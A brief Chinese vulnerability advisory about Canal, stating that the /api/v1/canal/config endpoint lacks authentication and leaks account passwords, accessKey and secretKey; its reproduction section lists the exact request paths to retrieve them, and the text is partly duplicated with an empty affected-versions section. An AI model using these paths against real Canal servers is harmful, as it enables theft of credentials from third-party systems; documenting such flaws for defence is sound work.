Canal存在敏感信息泄露漏洞
一、漏洞描述
由于/api/v1/canal/config 未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露
二、影响版本
三、漏洞复现
/api/v1/canal/config/1/0
/api/v1/canal/config/0/9
/api/v1/canal/instance/1
由于/api/v1/canal/config 未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露
/api/v1/canal/config/1/0
/api/v1/canal/config/0/9
/api/v1/canal/instance/1